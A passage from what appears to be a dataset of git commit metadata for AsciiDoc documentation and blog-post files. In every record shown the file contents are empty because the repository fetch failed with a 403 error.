GitLab\n\nSigned-off-by: Sebastian Davids 
<ad054bf4072605cd37d196cd013ffd05b05c77ca@gmx.de>\n","repos":"sdavids\/sdavids-commons-entity,sdavids\/sdavids-commons-entity","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sdavids\/sdavids-commons-entity.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1111417cb606f30dbdb4ce66e38c1f33fb28e56a","subject":"readme added.","message":"readme added.\n","repos":"hivemq\/hivemq-sys-topic-plugin","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hivemq\/hivemq-sys-topic-plugin.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"574ad264ea0cfd54430818b9ac9e30cc7db3fa07","subject":"ENTESB-8082 - add top level readme","message":"ENTESB-8082 - add top level readme\n","repos":"jboss-fuse\/fuse-karaf,jboss-fuse\/fuse-karaf,jboss-fuse\/fuse-karaf","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jboss-fuse\/fuse-karaf.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e19b49f61454ba2366a682636919e295a8516689","subject":"y2b create post $10,000 Ultimate Setup Giveaway!","message":"y2b create post $10,000 Ultimate Setup Giveaway!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-09-09-10000-Ultimate-Setup-Giveaway.adoc","new_file":"_posts\/2015-09-09-10000-Ultimate-Setup-Giveaway.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"035983696ce9685fe47653cd46c4146763af39d0","subject":"Update 2015-09-14-Ruby-on-Rails-Material-Design.adoc","message":"Update 2015-09-14-Ruby-on-Rails-Material-Design.adoc","repos":"devopSkill\/devopskill.github.io,devopSkill\/devopskill.github.io,devopSkill\/devopskill.github.io","old_file":"_posts\/2015-09-14-Ruby-on-Rails-Material-Design.adoc","new_file":"_posts\/2015-09-14-Ruby-on-Rails-Material-Design.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/devopSkill\/devopskill.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eddda53924f3bdc9b965af1e61e3c152c971795c","subject":"Update 2015-09-29-AWS-ChinaBeijing-Region-Tips.adoc","message":"Update 2015-09-29-AWS-ChinaBeijing-Region-Tips.adoc","repos":"fastretailing\/blog,fastretailing\/blog,fastretailing\/blog","old_file":"_posts\/2015-09-29-AWS-ChinaBeijing-Region-Tips.adoc","new_file":"_posts\/2015-09-29-AWS-ChinaBeijing-Region-Tips.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fastretailing\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dd1b830fc61526523f292869ee5e2355a1d55efd","subject":"y2b create post World's First Unboxing in 360","message":"y2b create post World's First Unboxing in 
360","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-05-19-Worlds-First-Unboxing-in-360.adoc","new_file":"_posts\/2016-05-19-Worlds-First-Unboxing-in-360.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"74636e6b72643822c69c60aa66067320769c6384","subject":"Update 2017-09-13-Part-0-Introducing-SP-A.adoc","message":"Update 2017-09-13-Part-0-Introducing-SP-A.adoc","repos":"txemis\/txemis.github.io,txemis\/txemis.github.io,txemis\/txemis.github.io,txemis\/txemis.github.io,txemis\/txemis.github.io","old_file":"_posts\/2017-09-13-Part-0-Introducing-SP-A.adoc","new_file":"_posts\/2017-09-13-Part-0-Introducing-SP-A.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/txemis\/txemis.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"814e1d1c5a25eaa9e9bb7e9aa6c250c7207c672e","subject":"Update 2016-04-25-Butter-Knife-y-los-dialogos.adoc","message":"Update 2016-04-25-Butter-Knife-y-los-dialogos.adoc","repos":"carlosdominguezmartin\/carlosdominguezmartin.github.io,carlosdominguezmartin\/carlosdominguezmartin.github.io,carlosdominguezmartin\/carlosdominguezmartin.github.io,carlosdominguezmartin\/carlosdominguezmartin.github.io","old_file":"_posts\/2016-04-25-Butter-Knife-y-los-dialogos.adoc","new_file":"_posts\/2016-04-25-Butter-Knife-y-los-dialogos.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/carlosdominguezmartin\/carlosdominguezmartin.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"03c3bd1bf21e7cdbf980c35b91dfd6b623b85b12","subject":"Update 2019-03-12-A-B.adoc","message":"Update 2019-03-12-A-B.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-03-12-A-B.adoc","new_file":"_posts\/2019-03-12-A-B.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"07097e12cfbd0fd2189093429fc962855322d0f9","subject":"Draft of modules post","message":"Draft of modules post\n","repos":"clojure\/clojurescript-site","old_file":"content\/news\/2017-07-14-code-splitting.adoc","new_file":"content\/news\/2017-07-14-code-splitting.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojurescript-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"2567627de8dcfda816bfceef76b582a779bf34f9","subject":":global-exports post","message":":global-exports post\n","repos":"clojure\/clojurescript-site","old_file":"content\/news\/2017-07-30-global-exports.adoc","new_file":"content\/news\/2017-07-30-global-exports.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojurescript-site.git\/': The requested URL returned error: 
403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"6dacb50b043317d7ac30e1b0b1b8fa0da61c1c40","subject":"Link formatter settings","message":"Link formatter settings\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"Dev tools\/Eclipse.adoc","new_file":"Dev tools\/Eclipse.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"93d3e37969a44cd976fc78a8509327d7227a3060","subject":"Apiman offline blog","message":"Apiman offline blog\n","repos":"apiman\/apiman.github.io,kahboom\/apiman.github.io,kahboom\/apiman.github.io,msavy\/apiman.github.io,apiman\/apiman.github.io,kahboom\/apiman.github.io,msavy\/apiman.github.io,apiman\/apiman.github.io,kahboom\/apiman.github.io,msavy\/apiman.github.io,apiman\/apiman.github.io,msavy\/apiman.github.io","old_file":"_blog-src\/_posts\/2016-04-04-locked-down-network.adoc","new_file":"_blog-src\/_posts\/2016-04-04-locked-down-network.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kahboom\/apiman.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"84164ad81c9d50567403f9ca2ded214e76f30271","subject":"Update 2017-08-11-Bai-viet-thu-nghiem-Hubpress.adoc","message":"Update 2017-08-11-Bai-viet-thu-nghiem-Hubpress.adoc","repos":"kimkha-blog\/kimkha-blog.github.io,kimkha-blog\/kimkha-blog.github.io,kimkha-blog\/kimkha-blog.github.io,kimkha-blog\/kimkha-blog.github.io","old_file":"_posts\/2017-08-11-Bai-viet-thu-nghiem-Hubpress.adoc","new_file":"_posts\/2017-08-11-Bai-viet-thu-nghiem-Hubpress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kimkha-blog\/kimkha-blog.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"97de4eefc1885db706c6978d4152a2ccbbc10947","subject":"Update 2018-12-25-Akamai-Site-Shield-Terraform.adoc","message":"Update 2018-12-25-Akamai-Site-Shield-Terraform.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-12-25-Akamai-Site-Shield-Terraform.adoc","new_file":"_posts\/2018-12-25-Akamai-Site-Shield-Terraform.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"731e6a9a8ffbfdd3658483090dbb7b5c605070e1","subject":"Update 2016-06-30-Goldilocks-Microservices.adoc","message":"Update 2016-06-30-Goldilocks-Microservices.adoc","repos":"Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io","old_file":"_posts\/2016-06-30-Goldilocks-Microservices.adoc","new_file":"_posts\/2016-06-30-Goldilocks-Microservices.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vanilla-Java\/vanilla-java.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"af3f734f4a04fc85e8f014b4f4f259105824ead8","subject":"Update 
2016-11-09-181200-Wednesday-Workday.adoc","message":"Update 2016-11-09-181200-Wednesday-Workday.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-09-181200-Wednesday-Workday.adoc","new_file":"_posts\/2016-11-09-181200-Wednesday-Workday.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"95e1c3ada31fd8dfd9401ea1c3fa6037079b9203","subject":"add clojureD 2017","message":"add clojureD 2017\n","repos":"clojure\/clojure-site","old_file":"content\/events\/2017\/clojured.adoc","new_file":"content\/events\/2017\/clojured.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"c2f04bb24996981aee53666a7cc810e14b5b7048","subject":"Publish 2017-0331-Die-sechs-Vermeidungen-des-Menschen.adoc","message":"Publish 2017-0331-Die-sechs-Vermeidungen-des-Menschen.adoc","repos":"backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io","old_file":"2017-0331-Die-sechs-Vermeidungen-des-Menschen.adoc","new_file":"2017-0331-Die-sechs-Vermeidungen-des-Menschen.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/backemulus\/backemulus.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"abbe950be8b3b4f6adbe0682deb79892995d2c63","subject":"Add tutorial.adoc","message":"Add tutorial.adoc\n","repos":"juxt\/edge,juxt\/edge","old_file":"doc\/resources\/doc\/sources\/tutorial.adoc","new_file":"doc\/resources\/doc\/sources\/tutorial.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/juxt\/edge.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"523c7e1d7edc970818202237e0024ba9f90eefad","subject":"Update 2016-04-20-domainhack-angularjs.adoc","message":"Update 2016-04-20-domainhack-angularjs.adoc","repos":"redrabbit-calligraphy\/redrabbit-calligraphy-blog,redrabbit-calligraphy\/redrabbit-calligraphy-blog,redrabbit-calligraphy\/redrabbit-calligraphy-blog,redrabbit-calligraphy\/redrabbit-calligraphy-blog","old_file":"_posts\/2016-04-20-domainhack-angularjs.adoc","new_file":"_posts\/2016-04-20-domainhack-angularjs.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/redrabbit-calligraphy\/redrabbit-calligraphy-blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bae10829bafb46e5a1abf4e7eb42fde352d6f0c3","subject":"Add the missing listeners guide chapter","message":"Add the missing listeners guide chapter\n\nWhile incomplete it's still a pretty good start.\n","repos":"rabbitmq\/cowboy,CrankWheel\/cowboy,kivra\/cowboy,K2InformaticsGmbH\/cowboy,hairyhum\/cowboy,bsmr-erlang\/cowboy,turtleDeng\/cowboy,ninenines\/cowboy","old_file":"doc\/src\/guide\/listeners.asciidoc","new_file":"doc\/src\/guide\/listeners.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/rabbitmq\/cowboy.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"3e96dee8ca9fdfe8037ab64e6320d43ace2b175c","subject":"y2b create post The Super MacBook Pro Upgrade (1TB RAID SSD Upgrade + RAM Upgrade 2013)","message":"y2b create post The Super MacBook Pro Upgrade (1TB RAID SSD Upgrade + RAM Upgrade 2013)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-06-29-The-Super-MacBook-Pro-Upgrade-1TB-RAID-SSD-Upgrade--RAM-Upgrade-2013.adoc","new_file":"_posts\/2013-06-29-The-Super-MacBook-Pro-Upgrade-1TB-RAID-SSD-Upgrade--RAM-Upgrade-2013.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d09c35b7257c7ffb788b9a8d4cd56374fed5ca9b","subject":"Update 2019-01-31-My-Alt-English-Title.adoc","message":"Update 2019-01-31-My-Alt-English-Title.adoc","repos":"ml4den\/hubpress,ml4den\/hubpress,ml4den\/hubpress,ml4den\/hubpress","old_file":"_posts\/2019-01-31-My-Alt-English-Title.adoc","new_file":"_posts\/2019-01-31-My-Alt-English-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ml4den\/hubpress.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"197749b9cb7f43daaec136df384a86f8ee0b0e8e","subject":"Minor updates based on answers from Raman","message":"Minor updates based on answers from Raman\n","repos":"EMCWorld\/2015-REST,EMCWorld\/2015-REST,EMCWorld\/2015-REST,EMCWorld\/2015-REST","old_file":"lab\/new-topic.adoc","new_file":"lab\/new-topic.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/EMCWorld\/2015-REST.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"34aa37e3d6d751300ba680e7661efc8c9bbb2cdb","subject":"Added list of changes in YANG 1.1","message":"Added list of changes in YANG 1.1\n\nChange-Id: Ifc3baeea73b47a1110ba463050b2c10a901e3a35\nSigned-off-by: Tony Tkacik <d0658a876d3f3373fb5ecec624b553a76d54e737@cisco.com>\n","repos":"opendaylight\/yangtools,opendaylight\/yangtools","old_file":"docs\/analysis\/yang-1-1.adoc","new_file":"docs\/analysis\/yang-1-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/opendaylight\/yangtools.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"cc32031f3b9b80b0786c88714e5399b70ba6e269","subject":"Update 2015-07-13-A-propos-de-nous.adoc","message":"Update 2015-07-13-A-propos-de-nous.adoc","repos":"TeksInHelsinki\/TeksInHelsinki.github.io,TeksInHelsinki\/TeksInHelsinki.github.io,TeksInHelsinki\/TeksInHelsinki.github.io","old_file":"_posts\/2015-07-13-A-propos-de-nous.adoc","new_file":"_posts\/2015-07-13-A-propos-de-nous.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TeksInHelsinki\/TeksInHelsinki.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"efb746000c26c85a6dcf68575c676a961c78de48","subject":"Update 2017-02-24-Google-Extension.adoc","message":"Update 
2017-02-24-Google-Extension.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-02-24-Google-Extension.adoc","new_file":"_posts\/2017-02-24-Google-Extension.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"99c4dc495db66ed24a10c409feb107f60442fc13","subject":"Update 2017-01-27-Google-Apps-Script-De-W-B-S.adoc","message":"Update 2017-01-27-Google-Apps-Script-De-W-B-S.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-27-Google-Apps-Script-De-W-B-S.adoc","new_file":"_posts\/2017-01-27-Google-Apps-Script-De-W-B-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"47eb8fcca4e09d38267776be7f70ebff97f4a291","subject":"Deleted _posts\/2015-08-06-Docker-for-Developers-be-ready-to-git-clone-docker-compose-up-pattern.adoc","message":"Deleted _posts\/2015-08-06-Docker-for-Developers-be-ready-to-git-clone-docker-compose-up-pattern.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2015-08-06-Docker-for-Developers-be-ready-to-git-clone-docker-compose-up-pattern.adoc","new_file":"_posts\/2015-08-06-Docker-for-Developers-be-ready-to-git-clone-docker-compose-up-pattern.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1e8eb2fd6528ca681223299f3201ce7c6e9009b5","subject":"Update 2016-06-23.adoc","message":"Update 2016-06-23.adoc","repos":"realraindust\/realraindust.github.io,realraindust\/realraindust.github.io,realraindust\/realraindust.github.io,realraindust\/realraindust.github.io","old_file":"_posts\/2016-06-23.adoc","new_file":"_posts\/2016-06-23.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/realraindust\/realraindust.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"623beede12712256e66ccdb131680def3d8ccc54","subject":"Update 2017-05-28.adoc","message":"Update 2017-05-28.adoc","repos":"dsp25no\/blog.dsp25no.ru,dsp25no\/blog.dsp25no.ru,dsp25no\/blog.dsp25no.ru,dsp25no\/blog.dsp25no.ru","old_file":"_posts\/2017-05-28.adoc","new_file":"_posts\/2017-05-28.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dsp25no\/blog.dsp25no.ru.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dbe2de0891ecd14207cbd91bc89f4cddcd4b72d9","subject":"[DOCS] Fixed callout reference error.","message":"[DOCS] Fixed callout reference 
error.\n","repos":"rajanm\/elasticsearch,scottsom\/elasticsearch,umeshdangat\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,lks21c\/elasticsearch,GlenRSmith\/elasticsearch,wangtuo\/elasticsearch,brandonkearby\/elasticsearch,scorpionvicky\/elasticsearch,strapdata\/elassandra,robin13\/elasticsearch,maddin2016\/elasticsearch,LeoYao\/elasticsearch,jimczi\/elasticsearch,shreejay\/elasticsearch,wenpos\/elasticsearch,coding0011\/elasticsearch,shreejay\/elasticsearch,scottsom\/elasticsearch,markwalkom\/elasticsearch,umeshdangat\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,robin13\/elasticsearch,jimczi\/elasticsearch,coding0011\/elasticsearch,qwerty4030\/elasticsearch,scottsom\/elasticsearch,jimczi\/elasticsearch,scorpionvicky\/elasticsearch,mjason3\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,scottsom\/elasticsearch,LeoYao\/elasticsearch,brandonkearby\/elasticsearch,fred84\/elasticsearch,mohit\/elasticsearch,masaruh\/elasticsearch,HonzaKral\/elasticsearch,coding0011\/elasticsearch,lks21c\/elasticsearch,kalimatas\/elasticsearch,mjason3\/elasticsearch,shreejay\/elasticsearch,brandonkearby\/elasticsearch,vroyer\/elasticassandra,LeoYao\/elasticsearch,jimczi\/elasticsearch,s1monw\/elasticsearch,naveenhooda2000\/elasticsearch,s1monw\/elasticsearch,lks21c\/elasticsearch,sneivandt\/elasticsearch,strapdata\/elassandra,strapdata\/elassandra,uschindler\/elasticsearch,pozhidaevak\/elasticsearch,maddin2016\/elasticsearch,fred84\/elasticsearch,scottsom\/elasticsearch,mohit\/elasticsearch,mohit\/elasticsearch,markwalkom\/elasticsearch,HonzaKral\/elasticsearch,mjason3\/elasticsearch,Stacey-Gammon\/elasticsearch,markwalkom\/elasticsearch,HonzaKral\/elasticsearch,gfyoung\/elasticsearch,rajanm\/elasticsearch,robin13\/elasticsearch,mohit\/elasticsearch,scorpionvicky\/elasticsearch,pozhidaevak\/elasticsearch,mjason3\/elasticsearch,masaruh\/elasticsearch,wenpos\/elasticsearch,s1monw\/elasticsearch,fred84\/elasticsearch,nknize\/elasticsearch,shreejay\/elasticsearch,mjason3\/elasticsearch,uschindler\/elasticsearch,rajanm\/elasticsearch,brandonkearby\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,vroyer\/elassandra,gfyoung\/elasticsearch,nknize\/elasticsearch,strapdata\/elassandra,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,wangtuo\/elasticsearch,markwalkom\/elasticsearch,sneivandt\/elasticsearch,maddin2016\/elasticsearch,naveenhooda2000\/elasticsearch,gingerwizard\/elasticsearch,wangtuo\/elasticsearch,Stacey-Gammon\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,kalimatas\/elasticsearch,nezirus\/elasticsearch,maddin2016\/elasticsearch,rajanm\/elasticsearch,naveenhooda2000\/elasticsearch,LeoYao\/elasticsearch,masaruh\/elasticsearch,umeshdangat\/elasticsearch,naveenhooda2000\/elasticsearch,fred84\/elasticsearch,vroyer\/elassandra,HonzaKral\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,lks21c\/elasticsearch,kalimatas\/elasticsearch,wenpos\/elasticsearch,GlenRSmith\/elasticsearch,vroyer\/elasticassandra,vroyer\/elassandra,markwalkom\/elasticsearch,sneivandt\/elasticsearch,qwerty4030\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,fred84\/elasticsearch,LeoYao\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,GlenRSmith\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,naveenhooda2000\/elasticsearch,gfyoung\/elasticsearch,sneivandt\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,nknize\/elasticsearch,wangtuo\/elasticsearch,shreejay\/elasticsearch,uschindler\/elasticsearch,s1monw\/elasticsearc
h,nezirus\/elasticsearch,wangtuo\/elasticsearch,Stacey-Gammon\/elasticsearch,scorpionvicky\/elasticsearch,LeoYao\/elasticsearch,gingerwizard\/elasticsearch,qwerty4030\/elasticsearch,Stacey-Gammon\/elasticsearch,nezirus\/elasticsearch,umeshdangat\/elasticsearch,mohit\/elasticsearch,vroyer\/elasticassandra,rajanm\/elasticsearch,pozhidaevak\/elasticsearch,lks21c\/elasticsearch,sneivandt\/elasticsearch,umeshdangat\/elasticsearch,qwerty4030\/elasticsearch,nezirus\/elasticsearch,qwerty4030\/elasticsearch,rajanm\/elasticsearch,uschindler\/elasticsearch,pozhidaevak\/elasticsearch,markwalkom\/elasticsearch,kalimatas\/elasticsearch,wenpos\/elasticsearch,masaruh\/elasticsearch,masaruh\/elasticsearch,GlenRSmith\/elasticsearch,LeoYao\/elasticsearch,scorpionvicky\/elasticsearch,pozhidaevak\/elasticsearch,nezirus\/elasticsearch,brandonkearby\/elasticsearch,strapdata\/elassandra,gfyoung\/elasticsearch,kalimatas\/elasticsearch,maddin2016\/elasticsearch,jimczi\/elasticsearch,wenpos\/elasticsearch,Stacey-Gammon\/elasticsearch,coding0011\/elasticsearch,gfyoung\/elasticsearch,s1monw\/elasticsearch","old_file":"docs\/reference\/index-modules\/index-sorting.asciidoc","new_file":"docs\/reference\/index-modules\/index-sorting.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mohit\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"81ce7c93791ad539889f15e7be075508b528a31d","subject":"y2b create post Google Pixel XL Unboxing - The New Android King?","message":"y2b create post Google Pixel XL Unboxing - The New Android King?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-10-20-Google-Pixel-XL-Unboxing--The-New-Android-King.adoc","new_file":"_posts\/2016-10-20-Google-Pixel-XL-Unboxing--The-New-Android-King.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3ba2ee0eb47336d6c7c53e89ac520fbed8c5b86f","subject":"add deref","message":"add deref\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2021\/12\/10\/deref.adoc","new_file":"content\/news\/2021\/12\/10\/deref.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"dda74081f91b1086c85b4b9a2aaa9fc392c62c9c","subject":"Cleanup from-source installation instructions","message":"Cleanup from-source installation instructions\n\nWe were previously recommending setting both CMAKE_INSTALL_PREFIX and DESTDIR to\n\/opt\/kudu, which would result in artifacts being installed into\n\/opt\/kudu\/opt\/kudu. 
Additionally, we listed the installation step as optional,\nbut included it in the overall build script which skips optional steps.\n\nChange-Id: Ib8d7d5e564d5b03a6f3bd092d8e1f2ad1aa17405\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/1872\nReviewed-by: Misty Stanley-Jones <b9f9ef9e00c258208ea831c64cc129eda4ac78b4@apache.org>\nTested-by: Dan Burkert <2591e5f46f28d303f9dc027d475a5c60d8dea17a@cloudera.com>\n","repos":"InspurUSA\/kudu,andrwng\/kudu,andrwng\/kudu,andrwng\/kudu,cloudera\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,cloudera\/kudu,InspurUSA\/kudu,andrwng\/kudu,cloudera\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,andrwng\/kudu,cloudera\/kudu,cloudera\/kudu,helifu\/kudu,andrwng\/kudu,andrwng\/kudu,helifu\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,cloudera\/kudu,helifu\/kudu,cloudera\/kudu,helifu\/kudu","old_file":"docs\/installation.adoc","new_file":"docs\/installation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e17f9d142d318e537136cc229657b6cc4b7863e8","subject":"Add missing article","message":"Add missing 